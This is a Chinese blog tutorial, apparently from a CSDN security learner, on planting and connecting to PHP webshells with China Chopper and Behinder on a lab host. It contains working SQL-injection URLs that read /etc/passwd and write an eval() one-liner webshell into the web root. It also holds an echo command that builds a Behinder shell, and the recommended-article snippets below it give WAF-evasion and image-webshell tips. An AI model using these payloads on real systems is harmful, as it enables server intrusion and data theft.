10-菜刀连接木马

已于 2024-04-16 10:41:32 修改
阅读量429 收藏 4
点赞数 2
文章标签: 网络安全 网络 php
于 2024-04-16 10:38:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianxiadiiw/article/details/137815889
版权

找到了漏洞后,并且上传了木马之后才能使用的两款工具

中国菜刀和冰蝎

想办法获取别人的cookie,cookie中有session-id

一、中国菜刀

1、必须提前已经完成木马植入然后才能使用

2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。

是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。

先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,4,5,6

有文件,则说明可以读任意路径的文件

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,(select load_file("/etc/passwd")),5,6

写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传

http://192.168.74.133/security/read.php?id=1 and 1=2 union select 1,2,3,"<?php @eval($_POST[a]) ; ?>",5,6 into outfile "/opt/lampp/htdocs/security/temp/mm.php"

在post中写入PHP的代码,a=phpinfo();可以获取你想要的配置信息,也可以用system函数来输入命令

接下来就可以连接菜刀,使用菜刀来连接木马然后就可以查看到服务器里面的东西了

使用wireshark进行抓包用来分析流量

假设菜刀被WAF挡了

二、Behinder冰蝎

冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开防火墙。

所以需要先上传一个冰蝎自己的带加密功能的shell脚本,这个上传shell的过程通常有以下几种方式:

1)直接在命令行运行命令,按行用echo 写入

a=system('echo "$post=file_get_contents("php://input");">> /opt/lampp/htdocs/security/temp/muma.php');

xuzhuoyang
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
菜刀php木马_Weevely(php菜刀)工具使用详解
weixin_36205101的博客
03-09 1034
-前言weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。项目地址:https://github.com/epinna/Weevely下面就针对该工具...
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 6723
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
dvwa问题篇 -- 菜刀蚁剑连接不上图片木马 -- 小黑解决教程
G_WEB_Xie的博客
12-27 728
各位小伙伴初次玩dvwa会出现各种问题,本来想把一些问题直接总结写一篇dvwa文章来着,但因为都是关键字搜索,所以将一些问题都拆分出来,以便大家方便查类似问题。(大家有遇到不一样的问题欢迎投稿!1、需要在菜刀上访问dvwa,设定为low级别,访问该图片。2、phpstudy的php版本过高将为5.0版本即可。菜刀蚁剑连接不上图片木马
菜刀连接图片一句话木马
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 30万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
菜刀php木马_菜刀php过waf
weixin_34098846的博客
03-09 749
关于PHP一、waf为啥会拦截菜刀菜刀连接时,会向server端POST数据,抓包查看:会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。方案一:...
java 菜刀_jsp一句话木马菜刀
weixin_30341121的博客
02-20 6198
1.如何使用JSP一句话木马菜刀木马相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨...
菜刀不能成功连接已上传木马
weixin_34138377的博客
11-12 1万+
前言   今天在渗透测试是通过后台上传了一个木马,并能成功访问,但是用菜刀连接不上,如图1,图2所示: 图1 图2 解决方法   刚开始我以为是我的菜刀的问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问! 此时我们需要使用菜刀进行登录网站,然后再用菜刀连接木马!首先我们在菜刀的链接处选中浏览网站,如图3所示: ...
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8113
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
行业文档-设计装置-一种节能菜刀.zip
08-29
行业文档-设计装置-一种节能菜刀.zip
Godzilla-V1.10.zip
01-27
1.集合mimikatz,无文件内存,过动态查杀等强大功能 2.程序仅限服务器管理,切勿用于非法用途,非法使用造成的一切后果由自己承担,与发布者无关 3.由于用户滥用造成的一切后果与发布者无关 4.用户请自觉遵守当地...
电子政务-家用电动菜刀.zip
09-17
电子政务-家用电动菜刀.zip
CSGO-CFG:菜刀的反恐精英
04-17
此配置是由“菜刀”而不是“”组成的,区别在于他是专业人士,我不是:)))) 这是他的设置 信息 请注意,此CFG中的绑定是根据QWERTY UK / Ireland键盘布局创建的 最近更新:21/04/21 鼠标:1khz轮询速率,400dpi...
小小菜刀编辑器2.0.rar
07-07
小小菜刀编辑器2.0 不同于1.0版是参考了网上众多的编辑器自主开发的一款轻量级编辑器。 兼容IE6.0 、IE7.0、Mozilla Firefox、Google Chrome
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8232
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
使用MPLS解决BGP的路由黑洞(详解)
最新发布
qq_64302290的博客
05-18 233
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
计算机网络
zengkui198513的博客
05-15 309
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
云服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 551
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
buuctf菜刀666
09-26
buf菜刀666是一个用于网络安全竞赛中的题目。根据引用中的描述,buuctf菜刀666是一个HTTP流量的题目。你可以在应用显示过滤器中输入http,查看统计里的http请求,进一步分析并解决这个题目。根据引用,你可能需要找到解压密码,可以在数据流中寻找或者进行爆破。请注意,解压密码可能以password的方式出现在数据流中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值